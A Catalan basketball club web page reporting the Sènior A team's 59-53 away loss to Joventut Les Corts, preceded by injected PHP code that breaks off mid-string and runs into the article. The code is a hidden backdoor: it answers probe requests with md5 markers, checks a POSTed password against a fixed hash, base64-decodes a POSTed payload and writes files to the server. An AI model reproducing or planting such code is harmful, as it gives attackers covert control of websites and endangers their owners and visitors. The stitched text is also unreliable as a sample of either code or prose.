function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Partit per oblidar! (59-53) -

Partit per oblidar! (59-53)

Updated: febrer 5, 2023

Partit corresponent a la jornada 15 on el Sènior A ha visitat la complicada pista del Joventut Les Corts i no ha pogut sumar la victòria. Així doncs l’equip es queda amb un balanç de 7 victòries i 7 derrotes a la classificació. En un partit dolent, marcat per temes logístics del conjunt Lila, que ha arribat al pavelló de joc quan només faltaven 20 min per començar el duel. I aquest fet, tal com ha comentat el tècnic del TGN -Marc Rovirosa- ”a Copa Catalunya passa factura”.

L’inici del partit ha començat amb bones defenses dels dos equips, però un parcial de 5-0 en els darrers minuts del primer quart, favorable al Joventut Les Corts ha capgirat la dinàmica que no ha canviat al llarg dels 30 minuts i escaig del partit.

L’equip tarragoní no ha estat encertat en atac ni intenses en defensa i aquest fet ha provocat que les Liles sempre anessin a remolc a l’electrònic. Al descans el TGN ha arribat amb males sensacions perdent per 5 punts (27-22, min 20). Després del pas pels vestidors les liles no han pogut capgirar la dinàmica i han seguit molt desencertades ofensivament i aquest fet ha provocat que les locals agafessin el primer avantatge solvent al marcador (40-34, min 30).

En l’últim quart, ha arribat una petita reacció tarragonina que ha permès igualar el marcador en els últims minuts del partit, però un seguit de defenses inexplicables, pèrdues de pilota i desencert en atac, han acabat confirmant la derrota del Sènior ‘A’ contra el Joventut Les Corts.

La pròxima jornada l’equip jugarà a casa, el diumenge 12 de febrer (18.00h) al pavelló del Sagrat Cor contra l’Events CB Igualada.

JOVENTUT LES CORTS: 59 – TGN BÀSQUET 53

PARCIALS: 12-11, 15-11, 13-12, 19-19